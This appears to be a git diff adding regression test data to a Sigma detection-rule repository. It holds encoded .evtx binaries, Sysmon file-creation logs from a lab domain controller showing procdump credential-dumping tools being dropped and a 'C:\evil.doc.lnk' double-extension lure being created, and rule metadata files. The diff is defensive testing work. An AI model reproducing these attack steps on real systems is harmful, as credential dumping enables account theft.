zJou{kOkjL9zlyPa^{&KsT2W~D23LNK@l}@Si!YVm1z1@#55B7WhJf#T65pje7eu)H zvc$>(F89`y=2`P!cg-uh&Rc$2GY`J1{Dy$IC=~rL|DxSiRh5JUyKujU(B&+8kOT8y(dhHx@Pnq{ zjJ+ua7)Hxv;z=RC$7uGLYROWyWHxWI3y_Qk%sZ+j>!2mGBUv=@P_z^_aURwdShFw- zH~g;9tOVaEsLE%GrpQx^2@iRVZbeK50THun1<4b9n;41GIj zzZuw17M(TyA*cH~lE?AB-ID*0XWKgMj;Ot3i5at#-1%kwGnek!_ssqOf%edj>>X>S z_;1Po!1k_;?Oh(ab?lLNe{Sy-M!YA=`IwCMjwPDmy&tpRvStczOT5|MMbc(Wz#M=B zMKSS*?Z#foqnHtM&f6DJyTKCEPEB$@uy;_9T!<)VY!I~+&E%9y$yFp`0(EHSAH}**$#pQf**_RQu8!U0kyd?LK z^sZU6{(7in1zAzq-eAoXk1TlG?7kcdmYo>T)$)h0c#zzwG zwVlo>3?JTRc7r9F;k~`J5UiQP+Y;}Fup9HgK4Xt<)dfbo@v-Dl<;l^1bmZ=}kvk~P z772eYOZ?zqlKc41g*}%&I_;~uUA=aLHB&sYN$$ipMVZf^eDzhCIbOTL znkgPx@+h#~7-6&<2PNLy54YYBKD^EB21_)d@k`GQ#CP+c$?V`mS~3e34BYRHB)$7;@uE-Lw={rXg3Z^9vyyc z?V_ZJ+6|WY#WP9n^!&A%vzBi>Wj1wwk?|DPO!3H)M}h5z_T6)eyA$qTNW42tI_q!Y z!`sYmutYPw`@k>Cnkl?3@oosafi7jyB2MEE_uu$Z@@T|06@}+U)NZiE;(sQ&UmTW~ zwSIbj-u9VZyTO_%9$E4zNV{=F;$3ifbr|tBvl}eY4DZS47Rj0^ye;u=2)jW&P)Anx zi+&|}G^+X4cXy4b-C&8E&q#7tF8HDMW7F^G5;MpBTF6yX*a%>c+XjVcNp zb@nl=teFR2HJ-2*;|U2%BfjrRd=D)h5@CE<;!%80d&Y{6c^eze`H;#j;X4PTT39oM zucdvh{yiOnw;H}XCBD-ZT@_(`S>lHYF899MHe~)|V{zhs%y+=}vSte3y5Rf1#5e8D zp%KQHC00#$xi9H*f99%d)=xczT7&Ur%@n?M!FQL$_l4!xcR3N!`j;iH`islGIsMI? zhxWfbCll{GT>r9W3g5cmyIbNrWcA_&zeE&YmiYQ6mpk)tcJCGMc6+@N?JJr=_*JZ| znZh?ze4Tjz*dy_s`O6~)e8+uq#zN6HgPOV^oK8Nrtr1Im%eZMUK~bVqhS@q zM~$f+M)>~Z;$8WEIPo_7t}#pWhc|1c@V3O;SnliPyT(EgFUTIy_iXn` ze!T7cI*j(f?7PM+(H}opGsO=}ei-dRu-`S-&4tDT_OpE``QZL0W?^L8fh_T@UtR8~ zS90^07d_If8$Le5?LgK{@xhW00sJugCB7XK8$}pjmN@ndmwU;ud-5Ke+9J01^d@m;pp8R7EF5;HMx vUHQtby*J$3@`D%8^Ww{zDSSi0S60O}e)MsgwU2Yv?z^Zp#Ha&x%z^&`6wr+D literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json new file mode 100644 index 000000000..c5be894a5 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.json @@ -0,0 +1,306 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.136421Z" + } + }, + "EventRecordID": 26359, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.134", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe", + "CreationUtcTime": "2025-10-24 23:43:34.134", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.154339Z" + } + }, + "EventRecordID": 26362, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.160852Z" + } + }, + "EventRecordID": 26366, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.145", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe", + "CreationUtcTime": "2025-10-24 23:43:34.145", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.177439Z" + } + }, + "EventRecordID": 26369, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.177", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump64a.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.183790Z" + } + }, + "EventRecordID": 26373, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.178", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe", + "CreationUtcTime": "2025-10-24 23:43:34.178", + "User": "ATTACKRANGE\\Administrator" + } + } +} +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:43:34.211790Z" + } + }, + "EventRecordID": 26376, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:43:34.209", + "ProcessGuid": "5AA13A44-D070-68FB-1A18-000000004002", + "ProcessId": 7680, + "Image": "C:\\Windows\\explorer.exe", + "TargetFilename": "C:\\Users\\Administrator\\Downloads\\procdump.exe:Zone.Identifier", + "CreationUtcTime": "2022-11-03 15:55:14.000", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml new file mode 100644 index 000000000..a5cb1267d --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/info.yml @@ -0,0 +1,13 @@ +id: ef67d58b-a7c2-434f-af87-34ae280a2968 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8fbf3271-1ef6-4e94-8210-03c2317947f6 + title: Cred Dump Tools Dropped Files +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_cred_dump_tools_dropped_files/8fbf3271-1ef6-4e94-8210-03c2317947f6.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx b/regression_data/windows/file/file_event/file_event_win_dump_file_susp_creation/aba15bdd-657f-422a-bab3-ac2d2a0d6f1c.evtx new file mode 100644 index 0000000000000000000000000000000000000000..b03d00a137629020b5eb8c7ec4f0a425d492ffa4 GIT binary patch literal 69632 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 literal 0 HcmV?d00001 diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json new file mode 100644 index 000000000..615f60c7b --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.json @@ -0,0 +1,51 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 11, + "Version": 2, + "Level": 4, + "Task": 11, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:54:01.546728Z" + } + }, + "EventRecordID": 86290, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "UtcTime": "2025-10-24 23:54:01.546", + "ProcessGuid": "5AA13A44-0C90-68FC-BF1D-000000004002", + "ProcessId": 10048, + "Image": "C:\\Windows\\system32\\cmd.exe", + "TargetFilename": "C:\\evil.doc.lnk", + "CreationUtcTime": "2025-10-24 23:54:01.546", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml new file mode 100644 index 000000000..e82d1a336 --- /dev/null +++ b/regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/info.yml @@ -0,0 +1,13 @@ +id: fbe93ba9-3124-4488-b6d8-ca3f7bb34c4b +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 3215aa19-f060-4332-86d5-5602511f3ca8 + title: Suspicious LNK Double Extension File Created +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/file/file_event/file_event_win_susp_lnk_double_extension/3215aa19-f060-4332-86d5-5602511f3ca8.evtx diff --git a/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx b/regression_data/windows/file/file_event/file_event_win_susp_public_folder_extension/b447f7de-1e53-4cbf-bfb4-f1f6d0b04e4e.evtx new file mode 100644 index 